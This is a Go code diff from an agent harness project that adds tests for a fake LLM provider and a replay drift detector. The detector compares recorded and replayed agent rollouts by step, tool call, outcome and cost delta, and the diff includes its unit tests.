+		fakeprovider.WithDefaultDelay(500*time.Millisecond))
+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Millisecond)
+	defer cancel()
+	_, err := p.Complete(ctx, simpleRequest())
+	assert.ErrorIs(t, err, context.DeadlineExceeded)
+}
+
+// ---------------------------------------------------------------------------
+// Hang / Release
+// ---------------------------------------------------------------------------
+
+func TestProvider_Hang_BlocksUntilRelease(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Hang: true, Content: "released"}})
+
+	done := make(chan harness.CompletionResult, 1)
+	go func() {
+		res, err := p.Complete(context.Background(), simpleRequest())
+		if err == nil {
+			done <- res
+		}
+	}()
+
+	// Give the goroutine time to block.
+	time.Sleep(30 * time.Millisecond)
+	select {
+	case <-done:
+		t.Fatal("expected Complete to be blocking")
+	default:
+	}
+
+	p.Release()
+
+	select {
+	case res := <-done:
+		assert.Equal(t, "released", res.Content)
+	case <-time.After(500 * time.Millisecond):
+		t.Fatal("Complete did not return after Release()")
+	}
+}
+
+func TestProvider_Hang_ContextCancel(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Hang: true}})
+
+	ctx, cancel := context.WithTimeout(context.Background(), 50*time.Millisecond)
+	defer cancel()
+
+	_, err := p.Complete(ctx, simpleRequest())
+	assert.ErrorIs(t, err, context.DeadlineExceeded)
+}
+
+func TestProvider_Release_Idempotent(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Hang: true}})
+	// Multiple Release calls must not panic (would double-close the channel).
+	p.Release()
+	p.Release()
+	p.Release()
+}
+
+// ---------------------------------------------------------------------------
+// ExhaustedBehavior
+// ---------------------------------------------------------------------------
+
+func TestProvider_ExhaustEmpty_ReturnsZero(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Content: "only"}})
+	_, _ = p.Complete(context.Background(), simpleRequest())
+	// Second call — exhausted, default ExhaustEmpty
+	res, err := p.Complete(context.Background(), simpleRequest())
+	require.NoError(t, err)
+	assert.Equal(t, "", res.Content)
+	assert.Nil(t, res.ToolCalls)
+}
+
+func TestProvider_ExhaustError_ReturnsError(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Content: "only"}},
+		fakeprovider.WithExhaustedBehavior(fakeprovider.ExhaustError))
+	_, _ = p.Complete(context.Background(), simpleRequest())
+	_, err := p.Complete(context.Background(), simpleRequest())
+	require.Error(t, err)
+}
+
+func TestProvider_ExhaustRepeatLast_RepeatsLastTurn(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{
+		{Content: "first"},
+		{Content: "last"},
+	}, fakeprovider.WithExhaustedBehavior(fakeprovider.ExhaustRepeatLast))
+	ctx := context.Background()
+	_, _ = p.Complete(ctx, simpleRequest()) // "first"
+	_, _ = p.Complete(ctx, simpleRequest()) // "last"
+	res, err := p.Complete(ctx, simpleRequest()) // repeat "last"
+	require.NoError(t, err)
+	assert.Equal(t, "last", res.Content)
+	res2, _ := p.Complete(ctx, simpleRequest()) // repeat again
+	assert.Equal(t, "last", res2.Content)
+}
+
+// ---------------------------------------------------------------------------
+// Reset
+// ---------------------------------------------------------------------------
+
+func TestProvider_Reset_RewindsCallsAndInvocations(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Content: "a"}, {Content: "b"}})
+	ctx := context.Background()
+	_, _ = p.Complete(ctx, simpleRequest())
+	_, _ = p.Complete(ctx, simpleRequest())
+	assert.Equal(t, 2, p.Calls())
+
+	p.Reset()
+	assert.Equal(t, 0, p.Calls())
+	assert.Empty(t, p.Invocations())
+
+	// Serves from beginning again.
+	res, err := p.Complete(ctx, simpleRequest())
+	require.NoError(t, err)
+	assert.Equal(t, "a", res.Content)
+}
+
+func TestProvider_Reset_RestoresHang(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Hang: true}})
+	// Release without hanging.
+	p.Release()
+	// Reset and confirm hang works again.
+	p.Reset()
+
+	ctx, cancel := context.WithTimeout(context.Background(), 50*time.Millisecond)
+	defer cancel()
+	_, err := p.Complete(ctx, simpleRequest())
+	assert.ErrorIs(t, err, context.DeadlineExceeded)
+}
+
+// ---------------------------------------------------------------------------
+// Invocations / LastRequest
+// ---------------------------------------------------------------------------
+
+func TestProvider_Invocations_RecordedCorrectly(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Content: "one"}, {Content: "two"}})
+	ctx := context.Background()
+	req1 := harness.CompletionRequest{Model: "m1"}
+	req2 := harness.CompletionRequest{Model: "m2"}
+	_, _ = p.Complete(ctx, req1)
+	_, _ = p.Complete(ctx, req2)
+
+	invs := p.Invocations()
+	require.Len(t, invs, 2)
+	assert.Equal(t, 0, invs[0].Index)
+	assert.Equal(t, "m1", invs[0].Request.Model)
+	assert.False(t, invs[0].Streamed)
+	assert.False(t, invs[0].StartedAt.IsZero())
+	assert.False(t, invs[0].ReturnedAt.IsZero())
+	assert.Nil(t, invs[0].Err)
+
+	assert.Equal(t, 1, invs[1].Index)
+	assert.Equal(t, "m2", invs[1].Request.Model)
+}
+
+func TestProvider_LastRequest_NotOkWhenNoCalls(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New(nil)
+	_, ok := p.LastRequest()
+	assert.False(t, ok)
+}
+
+func TestProvider_LastRequest_ReturnsLastRequest(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Content: "x"}, {Content: "y"}})
+	ctx := context.Background()
+	req1 := harness.CompletionRequest{Model: "first"}
+	req2 := harness.CompletionRequest{Model: "second"}
+	_, _ = p.Complete(ctx, req1)
+	_, _ = p.Complete(ctx, req2)
+	got, ok := p.LastRequest()
+	require.True(t, ok)
+	assert.Equal(t, "second", got.Model)
+}
+
+func TestProvider_StreamedFlag_RecordedInInvocation(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Deltas: []harness.CompletionDelta{{Content: "x"}}}})
+	req := streamingRequest(func(harness.CompletionDelta) {})
+	_, _ = p.Complete(context.Background(), req)
+	invs := p.Invocations()
+	require.Len(t, invs, 1)
+	assert.True(t, invs[0].Streamed)
+}
+
+// ---------------------------------------------------------------------------
+// errors.go — error helpers
+// ---------------------------------------------------------------------------
+
+func TestRateLimitError_IsRetryable(t *testing.T) {
+	t.Parallel()
+	err := fakeprovider.RateLimitError("too many requests")
+	assert.True(t, fakeprovider.IsRetryable(err))
+
+	var phe *harness.ProviderHTTPError
+	require.True(t, errors.As(err, &phe))
+	assert.Equal(t, 429, phe.StatusCode)
+	assert.Equal(t, "too many requests", phe.Body)
+	assert.Equal(t, "fake", phe.Provider)
+}
+
+func TestRetryableError_WrapsErr(t *testing.T) {
+	t.Parallel()
+	base := errors.New("network timeout")
+	err := fakeprovider.RetryableError(base)
+	assert.True(t, fakeprovider.IsRetryable(err))
+}
+
+func TestRetryableError_PassesThroughProviderHTTPError429(t *testing.T) {
+	t.Parallel()
+	orig := &harness.ProviderHTTPError{Provider: "openai", StatusCode: 429, Body: "rate limit"}
+	wrapped := fakeprovider.RetryableError(orig)
+	// Should be the same underlying error (already retryable).
+	assert.True(t, fakeprovider.IsRetryable(wrapped))
+	var phe *harness.ProviderHTTPError
+	require.True(t, errors.As(wrapped, &phe))
+	assert.Equal(t, 429, phe.StatusCode)
+}
+
+func TestGenericError_NotRetryable(t *testing.T) {
+	t.Parallel()
+	err := fakeprovider.GenericError("bad request")
+	assert.False(t, fakeprovider.IsRetryable(err))
+	assert.EqualError(t, err, "bad request")
+}
+
+func TestIsRetryable_RetryableStatusCodes(t *testing.T) {
+	t.Parallel()
+	retryCodes := []int{429, 500, 502, 503, 504}
+	for _, code := range retryCodes {
+		err := &harness.ProviderHTTPError{Provider: "fake", StatusCode: code, Body: "err"}
+		assert.True(t, fakeprovider.IsRetryable(err), "code %d should be retryable", code)
+	}
+}
+
+func TestIsRetryable_NonRetryableStatusCodes(t *testing.T) {
+	t.Parallel()
+	nonRetryCodes := []int{400, 401, 403, 404, 422}
+	for _, code := range nonRetryCodes {
+		err := &harness.ProviderHTTPError{Provider: "fake", StatusCode: code, Body: "err"}
+		assert.False(t, fakeprovider.IsRetryable(err), "code %d should not be retryable", code)
+	}
+}
+
+func TestIsRetryable_NilAndPlainErrors(t *testing.T) {
+	t.Parallel()
+	assert.False(t, fakeprovider.IsRetryable(nil))
+	assert.False(t, fakeprovider.IsRetryable(errors.New("plain")))
+}
+
+// ---------------------------------------------------------------------------
+// WithName option
+// ---------------------------------------------------------------------------
+
+func TestProvider_WithName_SetsName(t *testing.T) {
+	t.Parallel()
+	// Verify the option doesn't panic and the provider still works.
+	p := fakeprovider.New([]fakeprovider.Turn{{Content: "ok"}}, fakeprovider.WithName("mytest"))
+	res, err := p.Complete(context.Background(), simpleRequest())
+	require.NoError(t, err)
+	assert.Equal(t, "ok", res.Content)
+}
+
+// ---------------------------------------------------------------------------
+// Thread safety — 50 concurrent Complete calls
+// ---------------------------------------------------------------------------
+
+func TestProvider_ConcurrentComplete_ThreadSafe(t *testing.T) {
+	t.Parallel()
+	const concurrency = 50
+
+	// Enough turns for all goroutines.
+	turns := make([]fakeprovider.Turn, concurrency)
+	for i := range turns {
+		turns[i] = fakeprovider.Turn{Content: "resp"}
+	}
+	p := fakeprovider.New(turns)
+
+	var wg sync.WaitGroup
+	for i := 0; i < concurrency; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			_, _ = p.Complete(context.Background(), simpleRequest())
+		}()
+	}
+	wg.Wait()
+
+	assert.Equal(t, concurrency, p.Calls())
+	assert.Len(t, p.Invocations(), concurrency)
+}
+
+// ---------------------------------------------------------------------------
+// Interface compliance compile-time check
+// ---------------------------------------------------------------------------
+
+var _ harness.Provider = (*fakeprovider.Provider)(nil)

--- a/internal/forensics/replay/drift.go
+++ b/internal/forensics/replay/drift.go
@@ -1,0 +1,362 @@
+package replay
+
+import (
+	"encoding/json"
+	"fmt"
+	"sort"
+
+	"go-agent-harness/internal/forensics/differ"
+	"go-agent-harness/internal/forensics/rollout"
+)
+
+// DriftResult is the structured outcome of comparing an ORIGINAL recorded
+// rollout against a REPLAYED one (a re-run of the harness against the recorded
+// provider). It classifies the differ's step-level diff into the categories the
+// drift contract cares about, separates tool-call divergence from generic
+// content changes, and reports cost as a non-fatal delta.
+//
+// # Replay drift contract (deliverable E)
+//
+// Drift detection is the opt-in, second layer of replay (the first is integrity:
+// offline causal-consistency checking of a single recorded stream, which never
+// re-executes anything). For drift, the harness is re-run against the recorded
+// provider (replay.RecordedProvider) with tool execution short-circuited to the
+// recorded outputs (replay.NewReplayToolHandler). Every provider output and tool
+// result is therefore fixed to the original recording, so the harness's own
+// step/decision logic is the ONLY live variable. Any difference the diff finds
+// is attributable to the harness — that is what "drift" means here.
+//
+// Both streams are canonicalized with rollout.DriftOptions before diffing. The
+// contract partitions every field as DETERMINISTIC (a difference IS drift) or
+// VARIABLE (stripped before diffing, so a difference is NOT drift):
+//
+//	DETERMINISTIC (drift if different):
+//	  - per-step event TYPE sequence and step grouping
+//	  - assistant content
+//	  - the SET of tool calls (name + normalized arguments) and call_id→tool map
+//	  - tool results fed back into the conversation
+//	  - terminal outcome (completed vs failed)
+//	  - total step / turn count
+//
+//	VARIABLE (stripped before diffing; never drift on its own):
+//	  - ts / Timestamp; run_id; event id / seq
+//	  - total_duration_ms / ttft_ms / latency_ms (wall-clock timings)
+//	  - provider name; prompt_hash; model_version
+//	  - within-step ORDERING of concurrent tool events (order-insensitive
+//	    within a step — see normalizeWithinStep)
+//
+// COST is reported as CostDeltaUSD, never a hard mismatch: pricing or model
+// drift is surfaced for inspection, not treated as a failed replay.
+type DriftResult struct {
+	// AddedSteps are step numbers present in the replay but not the original
+	// (the replay took extra steps).
+	AddedSteps []int `json:"added_steps"`
+	// RemovedSteps are step numbers present in the original but not the replay
+	// (the replay took fewer steps).
+	RemovedSteps []int `json:"removed_steps"`
+	// ChangedSteps are step numbers present in both whose deterministic content
+	// diverged (after within-step reorder normalization).
+	ChangedSteps []int `json:"changed_steps"`
+	// DivergentToolCalls describes tool calls whose name or normalized arguments
+	// differ between the runs, or that appear in only one run.
+	DivergentToolCalls []ToolCallDivergence `json:"divergent_tool_calls"`
+	// CostDeltaUSD is replayed total cost minus original total cost. Positive
+	// means the replay cost more. Never causes Matched=false on its own.
+	CostDeltaUSD float64 `json:"cost_delta_usd"`
+	// OutcomeDiff is "identical", "completed-vs-failed", "failed-vs-completed",
+	// or "diverged" (unknown terminal on one side).
+	OutcomeDiff string `json:"outcome_diff"`
+	// Score is the differ's regression score (winner + reasons), surfaced for
+	// the caller's convenience. It does not affect Matched.
+	Score differ.RegressionScore `json:"score"`
+	// Matched is true only when there are NO added/removed/changed steps AND the
+	// outcome is identical. Cost deltas and stripped variable fields do not
+	// affect it.
+	Matched bool `json:"matched"`
+}
+
+// ToolCallDivergence describes one tool call that differs between the original
+// and replayed runs. Side is "original" or "replayed" for a call present in only
+// one run; for a call present in both with different name/args, Side is "both".
+type ToolCallDivergence struct {
+	Step         int    `json:"step"`
+	CallID       string `json:"call_id"`
+	Side         string `json:"side"`
+	OriginalTool string `json:"original_tool,omitempty"`
+	ReplayedTool string `json:"replayed_tool,omitempty"`
+	OriginalArgs string `json:"original_args,omitempty"`
+	ReplayedArgs string `json:"replayed_args,omitempty"`
+}
+
+// DetectDrift canonicalizes both event streams with the drift options,
+// normalizes within-step ordering of concurrent tool events to be
+// order-insensitive, diffs them with the existing differ, and classifies the
+// result into structured drift fields. See the DriftResult doc comment for the
+// full replay drift contract.
+//
+// opts is normally rollout.DriftOptions; it is passed explicitly so callers can
+// tune canonicalization (e.g. for tests). Whatever opts is given, the within-step
+// reorder normalization is always applied so concurrent tool ordering is treated
+// as VARIABLE.
+func DetectDrift(original, replayed []rollout.RolloutEvent, opts rollout.CanonicalizationOptions) DriftResult {
+	canonA := normalizeWithinStep(rollout.Canonicalize(original, opts))
+	canonB := normalizeWithinStep(rollout.Canonicalize(replayed, opts))
+
+	// Diff over the canonicalized streams WITH cost fields intact, so the differ
+	// can compute the cost delta and the regression score (which weighs cost).
+	d := differ.Diff(canonA, canonB)
+
+	// Cost is reported as a delta, never as a hard step mismatch. Diff the STEP
+	// structure over copies that have the cost-bearing fields stripped, so a
+	// pure pricing/model cost change does not flag a step as "changed".
+	costlessA := stripCostFields(canonA)
+	costlessB := stripCostFields(canonB)
+	stepDiff := differ.Diff(costlessA, costlessB)
+
+	res := DriftResult{
+		CostDeltaUSD: d.CostDelta,
+		OutcomeDiff:  mapOutcome(d.OutcomeDiff),
+		Score:        d.Score,
+	}
+
+	for _, sd := range stepDiff.StepDiffs {
+		switch sd.Status {
+		case "only_in_b":
+			res.AddedSteps = append(res.AddedSteps, sd.Step)
+		case "only_in_a":
+			res.RemovedSteps = append(res.RemovedSteps, sd.Step)
+		case "diverged":
+			res.ChangedSteps = append(res.ChangedSteps, sd.Step)
+		}
+	}
+
+	res.DivergentToolCalls = diffToolCalls(canonA, canonB)
+
+	res.Matched = len(res.AddedSteps) == 0 &&
+		len(res.RemovedSteps) == 0 &&
+		len(res.ChangedSteps) == 0 &&
+		res.OutcomeDiff == "identical"
+
+	return res
+}
+
+// mapOutcome translates the differ's outcome vocabulary into the drift
+// contract's vocabulary.
+func mapOutcome(differOutcome string) string {
+	switch differOutcome {
+	case "identical":
+		return "identical"
+	case "b_failed":
+		return "completed-vs-failed"
+	case "a_failed":
+		return "failed-vs-completed"
+	default:
+		return "diverged"
+	}
+}
+
+// costFieldKeys are payload keys that carry run cost or its classification. They
+// are stripped from a COPY of the streams before the structural step diff so that
+// a pure cost difference (pricing or model drift) is surfaced as CostDeltaUSD
+// rather than flagged as a changed step. The values are still read for the cost
+// delta from the un-stripped streams.
+//
+// turn_cost_usd, cumulative_cost_usd and cost_totals are the cost amounts.
+// cost_status / pricing_version are the cost CLASSIFICATION: a faithful replay
+// against the recorded provider replays recorded cost AMOUNTS as explicit values
+// (cost_status "available"), whereas the original may have derived cost from live
+// pricing (e.g. "unpriced_model" for a model with no price). That classification
+// flip carries no amount difference, so per the drift contract — COST is a delta,
+// never a hard mismatch — it must not flag a step as changed.
+var costFieldKeys = []string{
+	"cumulative_cost_usd",
+	"turn_cost_usd",
+	"cost_totals",
+	"cost_status",
+	"pricing_version",
+}
+
+// stripCostFields returns a copy of events with cost-bearing payload keys
+// removed. Payload values are shallow-copied at the top level (sufficient,
+// because only top-level keys are deleted); the events themselves are not shared
+// with the input so the caller's streams remain intact.
+func stripCostFields(events []rollout.RolloutEvent) []rollout.RolloutEvent {
+	out := make([]rollout.RolloutEvent, len(events))
+	for i, ev := range events {
+		out[i] = ev
+		if ev.Payload == nil {
+			continue
+		}
+		hasCost := false
+		for _, k := range costFieldKeys {
+			if _, ok := ev.Payload[k]; ok {
+				hasCost = true
+				break
+			}
+		}
+		if !hasCost {
+			continue
+		}
+		cp := make(map[string]any, len(ev.Payload))
+		for k, v := range ev.Payload {
+			cp[k] = v
+		}
+		for _, k := range costFieldKeys {
+			delete(cp, k)
+		}
+		out[i].Payload = cp
+	}
+	return out
+}
+
+// normalizeWithinStep returns a copy of canonicalized events with events sorted
+// into a stable order WITHIN each step, so that the order of concurrent tool
+// events (which is non-deterministic between runs) does not register as drift.
+// Step grouping and the relative order of distinct steps are preserved — only
+// the order of events that share a step number is canonicalized.
+//
+// The input is assumed already sorted by step (rollout.Canonicalize guarantees
+// this with a stable sort). Within a step, events are ordered by a stable
+// signature: (type, canonical-payload-JSON). reflect-equal events thus land in
+// a deterministic position regardless of their recorded order.
+func normalizeWithinStep(events []rollout.RolloutEvent) []rollout.RolloutEvent {
+	out := make([]rollout.RolloutEvent, len(events))
+	copy(out, events)
+
+	// Walk contiguous runs of equal Step and sort each run in place.
+	i := 0
+	for i < len(out) {
+		j := i + 1
+		for j < len(out) && out[j].Step == out[i].Step {
+			j++
+		}
+		run := out[i:j]
+		sort.SliceStable(run, func(a, b int) bool {
+			return eventSignature(run[a]) < eventSignature(run[b])
+		})
+		i = j
+	}
+	return out
+}
+
+// eventSignature returns a stable, content-derived key for ordering events
+// within a step. It combines the event type with a canonical JSON encoding of
+// the payload (Go's encoding/json sorts map keys, so the encoding is stable for
+// a given payload value).
+func eventSignature(ev rollout.RolloutEvent) string {
+	payloadSig := ""
+	if ev.Payload != nil {
+		if b, err := json.Marshal(ev.Payload); err == nil {
+			payloadSig = string(b)
+		}
+	}
+	return ev.Type + "\x00" + payloadSig
+}
+
+// recordedToolCall is the deterministic identity of a tool call: its name and
+// normalized arguments, keyed by call_id within a step.
+type recordedToolCall struct {
+	step int
+	tool string
+	args string
+}
+
+// diffToolCalls compares the set of tool.call.started events between the two
+// canonicalized streams, keyed by (step, call_id). A call present in only one
+// stream, or present in both with a different tool name or arguments, is a
+// divergence. Because lookups are keyed by call_id (not position), within-step
+// reordering of concurrent calls does NOT register as divergence.
+func diffToolCalls(a, b []rollout.RolloutEvent) []ToolCallDivergence {
+	callsA := indexStartedCalls(a)
+	callsB := indexStartedCalls(b)
+
+	// Collect the union of keys in a stable (step, call_id) order.
+	keys := make([]string, 0, len(callsA)+len(callsB))
+	seen := make(map[string]bool, len(callsA)+len(callsB))
+	for k := range callsA {
+		if !seen[k] {
+			seen[k] = true
+			keys = append(keys, k)
+		}
+	}
+	for k := range callsB {
+		if !seen[k] {
+			seen[k] = true
+			keys = append(keys, k)
+		}
+	}
+	stepOf := func(k string) int {
+		if c, ok := callsA[k]; ok {
+			return c.step
+		}
+		return callsB[k].step
+	}
+	sort.Slice(keys, func(i, j int) bool {
+		si, sj := stepOf(keys[i]), stepOf(keys[j])
+		if si != sj {
+			return si < sj
+		}
+		return keys[i] < keys[j]
+	})
+
+	var out []ToolCallDivergence
+	for _, k := range keys {
+		ca, inA := callsA[k]
+		cb, inB := callsB[k]
+		callID := callIDFromKey(k)
+		switch {
+		case inA && !inB:
+			out = append(out, ToolCallDivergence{
+				Step: ca.step, CallID: callID, Side: "original",
+				OriginalTool: ca.tool, OriginalArgs: ca.args,
+			})
+		case !inA && inB:
+			out = append(out, ToolCallDivergence{
+				Step: cb.step, CallID: callID, Side: "replayed",
+				ReplayedTool: cb.tool, ReplayedArgs: cb.args,
+			})
+		default:
+			if ca.tool != cb.tool || ca.args != cb.args {
+				out = append(out, ToolCallDivergence{
+					Step: ca.step, CallID: callID, Side: "both",
+					OriginalTool: ca.tool, OriginalArgs: ca.args,
+					ReplayedTool: cb.tool, ReplayedArgs: cb.args,
+				})
+			}
+		}
+	}
+	return out
+}
+
+// indexStartedCalls builds a map keyed by "step\x00call_id" → recordedToolCall
+// from the tool.call.started events. Calls without a call_id are keyed by a
+// synthetic id so they are still surfaced if they diverge.
+func indexStartedCalls(events []rollout.RolloutEvent) map[string]recordedToolCall {
+	m := make(map[string]recordedToolCall)
+	synthetic := 0
+	for _, ev := range events {
+		if ev.Type != "tool.call.started" {
+			continue
+		}
+		callID, _ := payloadString(ev.Payload, "call_id")
+		tool, _ := payloadString(ev.Payload, "tool")
+		args, _ := payloadStringOrJSON(ev.Payload, "arguments")
+		if callID == "" {
+			callID = fmt.Sprintf("\x01synthetic-%d", synthetic)
+			synthetic++
+		}
+		key := fmt.Sprintf("%d\x00%s", ev.Step, callID)
+		m[key] = recordedToolCall{step: ev.Step, tool: tool, args: args}
+	}
+	return m
+}
+
+// callIDFromKey extracts the call_id portion of a "step\x00call_id" key.
+func callIDFromKey(key string) string {
+	for i := 0; i < len(key); i++ {
+		if key[i] == 0 {
+			return key[i+1:]
+		}
+	}
+	return key
+}

--- a/internal/forensics/replay/drift_test.go
+++ b/internal/forensics/replay/drift_test.go
@@ -1,0 +1,208 @@
+package replay
+
+import (
+	"testing"
+
+	"go-agent-harness/internal/forensics/rollout"
+)
+
+// fixtureRollout is a small but representative recorded rollout: a tool-calling
+// turn (step 1) with two concurrent tool calls, a terminal assistant turn
+// (step 2), and a completed outcome. It exercises step grouping, tool-call
+// sets, and outcome detection.
+func fixtureRollout() []rollout.RolloutEvent {
+	return []rollout.RolloutEvent{
+		{Type: "run.started", Step: 0, Payload: map[string]any{"run_id": "r1", "prompt": "do the thing"}},
+		{Type: "llm.turn.completed", Step: 1, Payload: map[string]any{
+			"run_id": "r1", "provider": "openai", "latency_ms": float64(120),
+			"tool_calls": float64(2),
+		}},
+		{Type: "tool.call.started", Step: 1, Payload: map[string]any{
+			"run_id": "r1", "call_id": "call_a", "tool": "read_file", "arguments": `{"path":"/a"}`,
+		}},
+		{Type: "tool.call.completed", Step: 1, Payload: map[string]any{
+			"run_id": "r1", "call_id": "call_a", "tool": "read_file", "output": "contents a",
+		}},
+		{Type: "tool.call.started", Step: 1, Payload: map[string]any{
+			"run_id": "r1", "call_id": "call_b", "tool": "read_file", "arguments": `{"path":"/b"}`,
+		}},
+		{Type: "tool.call.completed", Step: 1, Payload: map[string]any{
+			"run_id": "r1", "call_id": "call_b", "tool": "read_file", "output": "contents b",
+		}},
+		{Type: "usage.delta", Step: 1, Payload: map[string]any{
+			"run_id": "r1", "cumulative_cost_usd": float64(0.0012),
+		}},
+		{Type: "llm.turn.completed", Step: 2, Payload: map[string]any{
+			"run_id": "r1", "provider": "openai", "ttft_ms": float64(40),
+		}},
+		{Type: "assistant.message", Step: 2, Payload: map[string]any{
+			"run_id": "r1", "content": "all done",
+		}},
+		{Type: "run.completed", Step: 3, Payload: map[string]any{
+			"run_id": "r1", "cost_totals": map[string]any{"total_cost_usd": float64(0.0012)},
+		}},
+	}
+}
+
+// T-F1b: DetectDrift on an IDENTICAL rollout must report Matched=true with zero
+// structural drift. This is the determinism guarantee: a faithful replay that
+// reproduces the recorded stream exactly must not be flagged as drift.
+func TestDetectDrift_IdenticalRollout(t *testing.T) {
+	events := fixtureRollout()
+
+	res := DetectDrift(events, events, rollout.DriftOptions)
+
+	if !res.Matched {
+		t.Fatalf("identical rollout: expected Matched=true, got false (outcome=%q, added=%v, removed=%v, changed=%v)",
+			res.OutcomeDiff, res.AddedSteps, res.RemovedSteps, res.ChangedSteps)
+	}
+	if len(res.AddedSteps) != 0 || len(res.RemovedSteps) != 0 || len(res.ChangedSteps) != 0 {
+		t.Errorf("identical rollout: expected zero step drift, got added=%v removed=%v changed=%v",
+			res.AddedSteps, res.RemovedSteps, res.ChangedSteps)
+	}
+	if len(res.DivergentToolCalls) != 0 {
+		t.Errorf("identical rollout: expected zero divergent tool calls, got %v", res.DivergentToolCalls)
+	}
+	if res.OutcomeDiff != "identical" {
+		t.Errorf("identical rollout: expected OutcomeDiff=identical, got %q", res.OutcomeDiff)
+	}
+	if res.CostDeltaUSD != 0 {
+		t.Errorf("identical rollout: expected zero cost delta, got %v", res.CostDeltaUSD)
+	}
+}
+
+// Within-step ordering of concurrent tool events must be treated as
+// NON-divergent: the same set of step-1 tool events emitted in a different
+// order is still Matched.
+func TestDetectDrift_WithinStepReorderNotDrift(t *testing.T) {
+	original := fixtureRollout()
+
+	// Reorder the two concurrent tool calls within step 1: emit call_b's
+	// started/completed before call_a's. Everything else is identical.
+	replayed := []rollout.RolloutEvent{
+		original[0], // run.started
+		original[1], // llm.turn.completed step1
+		original[4], // tool.call.started call_b
+		original[5], // tool.call.completed call_b
+		original[2], // tool.call.started call_a
+		original[3], // tool.call.completed call_a
+		original[6], // usage.delta
+		original[7], // llm.turn.completed step2
+		original[8], // assistant.message
+		original[9], // run.completed
+	}
+
+	res := DetectDrift(original, replayed, rollout.DriftOptions)
+
+	if !res.Matched {
+		t.Fatalf("within-step reorder should NOT be drift: Matched=false (changed=%v, divergent=%v)",
+			res.ChangedSteps, res.DivergentToolCalls)
+	}
+	if len(res.DivergentToolCalls) != 0 {
+		t.Errorf("within-step reorder: expected zero divergent tool calls, got %v", res.DivergentToolCalls)
+	}
+}
+
+// Cost differences must be reported as a delta, never as a hard mismatch:
+// a run that costs more but is otherwise structurally identical still Matches.
+func TestDetectDrift_CostDeltaNotMismatch(t *testing.T) {
+	original := fixtureRollout()
+	replayed := fixtureRollout()
+	// Bump the replayed cost (pricing/model drift) without changing structure.
+	replayed[6].Payload["cumulative_cost_usd"] = float64(0.0050)
+	replayed[9].Payload["cost_totals"] = map[string]any{"total_cost_usd": float64(0.0050)}
+
+	res := DetectDrift(original, replayed, rollout.DriftOptions)
+
+	if !res.Matched {
+		t.Fatalf("cost-only difference must still Match: Matched=false (changed=%v)", res.ChangedSteps)
+	}
+	if res.CostDeltaUSD <= 0 {
+		t.Errorf("expected positive CostDeltaUSD, got %v", res.CostDeltaUSD)
+	}
+}
+
+// T-F1c: a mutated turn must produce structured, non-empty drift with the right
+// classification. Changing the assistant content of the terminal turn is a
+// deterministic difference (a changed step), not a stripped/variable one.
+func TestDetectDrift_MutatedTurnIsDrift(t *testing.T) {
+	original := fixtureRollout()
+	replayed := fixtureRollout()
+	replayed[8].Payload["content"] = "something completely different"
+
+	res := DetectDrift(original, replayed, rollout.DriftOptions)
+
+	if res.Matched {
+		t.Fatalf("mutated assistant content must be drift: Matched=true")
+	}
+	if len(res.ChangedSteps) == 0 {
+		t.Errorf("expected a changed step for the mutated turn, got none (added=%v removed=%v)",
+			res.AddedSteps, res.RemovedSteps)
+	}
+	foundStep2 := false
+	for _, s := range res.ChangedSteps {
+		if s == 2 {
+			foundStep2 = true
+		}
+	}
+	if !foundStep2 {
+		t.Errorf("expected step 2 in ChangedSteps, got %v", res.ChangedSteps)
+	}
+}
+
+// A diverging tool call (different arguments for the same call_id) must be
+// surfaced in DivergentToolCalls, distinct from a plain content change.
+func TestDetectDrift_DivergentToolCall(t *testing.T) {
+	original := fixtureRollout()
+	replayed := fixtureRollout()
+	// call_a now reads a different path — a deterministic tool-arg divergence.
+	replayed[2].Payload["arguments"] = `{"path":"/HACKED"}`
+
+	res := DetectDrift(original, replayed, rollout.DriftOptions)
+
+	if res.Matched {
+		t.Fatalf("divergent tool arguments must be drift: Matched=true")
+	}
+	if len(res.DivergentToolCalls) == 0 {
+		t.Errorf("expected DivergentToolCalls non-empty, got %v", res.DivergentToolCalls)
+	}
+}
+
+// An added step (the replay took an extra turn) and a removed step (the replay
+// took fewer turns) must be classified into AddedSteps / RemovedSteps and break
+// the match.
+func TestDetectDrift_AddedAndRemovedSteps(t *testing.T) {
+	original := fixtureRollout()
+
+	// Replay that ends one step early: drop the terminal completion (step 3) and
+	// the terminal assistant turn (step 2 events), simulating a shorter run.
+	short := []rollout.RolloutEvent{
+		original[0], original[1], original[2], original[3],
+		original[4], original[5], original[6],
+		{Type: "run.completed", Step: 2, Payload: map[string]any{"run_id": "r1"}},
+	}
+
+	res := DetectDrift(original, short, rollout.DriftOptions)
+	if res.Matched {
+		t.Fatalf("a shorter replay must be drift: Matched=true")
+	}
+	if len(res.RemovedSteps) == 0 {
+		t.Errorf("expected RemovedSteps non-empty for a shorter replay, got %v", res.RemovedSteps)
+	}
+}
+
+// An outcome flip (completed in the original, failed in the replay) must be
+// reported via OutcomeDiff and break the match.
+func TestDetectDrift_OutcomeFlip(t *testing.T) {
+	original := fixtureRollout()
+	replayed := fixtureRollout()
+	replayed[9] = rollout.RolloutEvent{Type: "run.failed", Step: 3, Payload: map[string]any{"run_id": "r1", "error": "boom"}}
+
+	res := DetectDrift(original, replayed, rollout.DriftOptions)
+	if res.Matched {
+		t.Fatalf("outcome flip must be drift: Matched=true")
+	}
+	if res.OutcomeDiff == "identical" {
+		t.Errorf("expected non-identical OutcomeDiff for completed-vs-failed, got %q", res.OutcomeDiff)
+	}
+}

